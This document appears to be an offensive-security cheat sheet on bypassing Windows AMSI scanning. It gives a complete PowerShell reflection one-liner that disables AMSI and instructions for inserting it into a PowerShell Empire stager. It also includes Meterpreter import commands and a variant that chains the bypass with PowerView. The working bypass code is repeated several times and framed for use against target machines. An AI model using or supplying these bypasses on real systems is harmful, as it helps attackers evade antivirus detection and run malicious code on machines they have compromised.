# AMSI Bypasses ### AMSI Bypass with Powershell Empire * This assumes you have access to a powershell prompt on the target machine * Generate a stager, will look something like this: * On empire must `set Bypasses None` ``` powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0 --snip-- ``` * Take out the powershell so it is only base64 and decode, will look something like this ``` If($PSVersionTable.PSVersion.Major -ge 3){};[System.Net.ServicePointManager]:: --snip-- ``` * Notice the `If($PSVersionTable.PSVersion.Major -ge 3){};` * Take the AMSI Bypass below and input it in between `{ }` in the empire payload ``` $s = [Ref].Assembly.GetTypes();ForEach($b in $s) {if ($b.Name -like "*iUtils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*Failed") {$f = $e}};$f.SetValue($null,$true); ``` * Save off to a file locally `check.ps1` * Paste contents into powershell prompt #### MSF Meterpreter way * ``` go to meterpreter and run: load powershell powershell_import /path/to/file/created.ps1 ``` ### AMSI Bypass without Additional Payload * Can generate many AMSI Bypassess on ; * Simply paste into powershell prompt. * If successful AMSI is patched and the rest of your session will not be scanned by AMSI ### AMSI Bypass stacking with Powershell * Can do an session AMSI bypass by pasting command in powershell prompt ``` $s = [Ref].Assembly.GetTypes();ForEach($b in $s) {if ($b.Name -like "*iUtils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*Failed") {$f = $e}};$f.SetValue($null,$true); ``` * Or you can also stack it with a specific command ``` $s = [Ref].Assembly.GetTypes();ForEach($b in $s) {if ($b.Name -like "*iUtils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*Failed") {$f = $e}};$f.SetValue($null,$true); .\PowerView.ps1 ```